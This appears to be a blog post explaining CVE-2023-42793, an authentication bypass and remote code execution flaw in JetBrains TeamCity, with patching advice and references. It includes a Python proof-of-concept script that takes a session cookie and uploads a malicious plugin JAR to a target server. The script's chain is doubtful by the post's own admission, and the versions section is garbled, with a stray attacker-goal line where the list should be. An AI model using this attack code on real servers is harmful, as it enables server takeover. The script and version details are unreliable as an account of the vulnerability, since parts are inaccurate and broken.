CVE-2023-42793 is a critical vulnerability discovered in JetBrains TeamCity, affecting all versions prior to 2023.05.4. If you run an unpatched TeamCity server, attackers could bypass authentication and achieve remote code execution (RCE) with ease. This flaw made hundreds of TeamCity servers worldwide sitting ducks for attackers. In this exclusive post, we’ll break down how the exploit worked, look at a simplified code example, and show you how attackers abused this bug. We’ll keep the language simple – you don’t need to be a pro to follow along.
What is JetBrains TeamCity?
TeamCity is a popular continuous integration and build management server used by enterprises and developers. It helps you automate builds, tests, and deployments. Usually, access to TeamCity is tightly controlled: you need credentials to do anything meaningful.
Read the official JetBrains advisory here
- TeamCity Security Advisory
CVE-2023-42793 is an authentication bypass vulnerability that in practice allows any unauthenticated user to get administrator access. From there, attackers can upload plugins containing malicious code, execute arbitrary scripts, and fully compromise the TeamCity server.
Impacted Versions:
Use the server to pivot into corporate networks
If you haven’t patched your TeamCity server, stop reading and do it now.
Exploit Details: How Did Attackers Do It?
The core issue lies in TeamCity's web API (REST API). Certain endpoints failed to verify if you were logged in before allowing sensitive operations.
TeamCity exposes its REST API at endpoints like
/app/rest/
Normally, doing anything here requires authentication (session or token). However, due to a logic bug in the code for user management and plugin upload, a specific API endpoint failed to check if requests were authenticated.
Attackers could register an admin session and upload a plugin just by sending a properly crafted API request!
Proof of Concept Exploit Code
For educational purposes, here’s a simplified Python example (don’t use this on any system you do not own or have permission to test):
import requests
target = "http://teamcity.example.com"; # Change to target server
# Step 1: Attempt to get an unauthenticated admin token
r = requests.get(f"{target}/app/rest/server", headers={
"Accept": "application/json"
})
# Check for session cookie or auth info
if 'teamcity.session' in r.cookies:
session_cookie = r.cookies['teamcity.session']
print(f"Got session cookie: {session_cookie}")
# Step 2: Upload a malicious plugin (JAR file)
files = {
'file': ('exploit.jar', open('exploit.jar', 'rb'), 'application/java-archive'),
}
r2 = requests.post(f"{target}/app/rest/plugins", cookies={'teamcity.session': session_cookie}, files=files)
if r2.status_code == 200:
print("Plugin uploaded, server exploited!")
else:
print("Plugin upload failed:", r2.status_code)
else:
print("Failed to get admin session, target might be patched.")
Note: The actual exploit may use a slightly different endpoint or token extraction, but this illustrates the vulnerability chain.
Real-World Exploitation
These were not theoretical attacks. Shadowserver (link) tracked over 1,400 vulnerable public TeamCity servers right after the vulnerability dropped. Ransomware groups and APT actors were observed scanning and compromising unpatched servers.
How To Fix and Protect Yourself
- Update TeamCity ASAP: Go to JetBrains download page and install 2023.05.4 or later.
Additional Resources & References
1. JetBrains Advisory
2. Rapid7 Insight
3. Huntress Writeup
4. Shadowserver Stats
In Summary
CVE-2023-42793 is a wake-up call. If you use TeamCity, patch right now and check your logs for signs of past compromise. This bug shows how a small web app mistake can open the door to full infrastructure takeovers. Stay alert and keep your tools up-to-date!
Timeline
Published on: 09/19/2023 17:15:08 UTC
Last modified on: 10/03/2023 15:44:06 UTC